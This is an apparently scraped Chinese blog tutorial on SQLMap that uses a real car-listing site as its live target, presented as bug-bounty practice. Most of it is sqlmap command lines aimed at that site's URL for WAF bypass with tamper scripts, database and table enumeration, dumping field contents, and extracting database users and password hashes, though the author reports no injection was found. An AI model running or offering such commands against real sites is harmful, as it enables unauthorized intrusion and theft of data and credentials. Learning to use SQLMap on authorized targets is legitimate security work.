zoukankan      html  css  js  c++  java
  • 断剑重铸004

    常用的渗透测试工具

    SQLMap

    以汽车之家为例子,业务范围:*.autohome.com.cn *.che168.com,我是玩靶机的人吗?找SRC合法实战。。。
    官网:https://www.autohome.com.cn
    搜索一下奥迪Q5L:https://www.autohome.com.cn/4851
    审查元素发现输入框被设置为隐藏属性,URL手动输入:https://www.autohome.com.cn/4851/?id=奥迪Q5L,显示出奥迪Q5L结果

    既然参数找到了,就实战一下SQLMap

    直接用kali里面的sqlmap

    • 更新sqlmap
    cd /usr/share/
    rm -rf sqlmap/
    git clone https://github.com/sqlmapproject/sqlmap
    
    • 判断是否存在注入
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1"
    

    反馈中提示有waf

    • 我们知道sqlmap自带的有测waf的,进入tamper看看
    cd /usr/share/sqlmap/tamper
    ls
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --tamper apostrophemask
    

    从反馈的提示中发现,参数似乎不可注入,让我们尝试更多的选项

    • 再一次加入--time-sec=20,--level=3(1-5个级别,默认1)或者--risk(0-3,默认1)
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --tamper apostrophemask --time-sec=20 --level=3
    

    反馈发现还是不行。出于教学目的,能把sqlmap用到这里已经超过大部分小白了。

    • 判断文本中的请求是否存在注入

    抓HTTP请求包,把请求包保存都txt文本文件里面,配合sqlmap一起使用。
    这里配合火狐浏览器的,web开发者工具箱,拿到HTTP请求包。保存到kali桌面中命名为test.txt

    sqlmap -hh
    cd 桌面
    pwd test.txt
    sqlmap -r /root/桌面/test.txt
    
    • 查询当前用户下的所有数据库
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --dbs
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名
    
    • 获取数据库中的表名
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 --tables
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 -T 表名
    
    • 获取表中的字段名
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 -T 表名 --columns
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 -T 表名 -C 字段名
    
    • 获取字段内容
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --D 数据库名 -T 表名 -C 字段名 --dump
    
    • 获取数据库的所有用户,需要具备访问权
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --users
    
    • 获取数据库用户的密码
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --passwords
    
    • 获取当前网站数据库的名称
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --current--db
    
    • 获取当前网站数据库的用户名称
    sqlmap -u "https://www.autohome.com.cn/4851/?id=1" --current--user
    
    • 静与悟

    静下心,让我们聊聊以上技术的本源问题。
    我想,您应该发现了:在有资料和例子的情况下,通过搜索引擎您就可以完成以上所有部分。
    剩下的,无非就是别人用过各种参数,您没有枚举式使用过。
    没关系,您可以搜索SQLmap手册 参数等关键词,那里存在大量资料和例子。
    但是,我还是有必要提醒您,因为网络上所有的信息都是为人写上去的,书中详解肯定不会copy到网上。
    我的建议:已书籍,视频教学为主,互联网查询为辅。
    我举个例子:书中说,如果您不确定哪个参数存在注入的话,尽可能的使用--level 3以上的级别。
    您可以尽管的去网上搜,10个结果中有3个如此教学,那么这文章真的就是在教学,否则只能认为它是简要的笔记,用于查询。
    哪怕就是最详细的教学文章,它的篇幅也是心有余而力不足。无法满足那些极度认真的人,成长。阅读吧,请。

  • 相关阅读:
    RBO基于规则的优化器access paths优先级
    脚本:监控临时表空间使用率
    脚本:格式化的V$SQL_SHARED_CURSOR报告
    脚本:监控并行进程状态
    Oracle内部错误:ORA00600[25012]一例
    Trace obtained enqueue information by set event 10704
    Script:Translate RDBA relative data block address
    [Repost]List of X$ Tables
    Oracle学习笔记:oem手工管理
    Oracle学习笔记:redo重做日志
  • 原文地址:https://www.cnblogs.com/sec875/p/11409987.html
Copyright © 2011-2022 走看看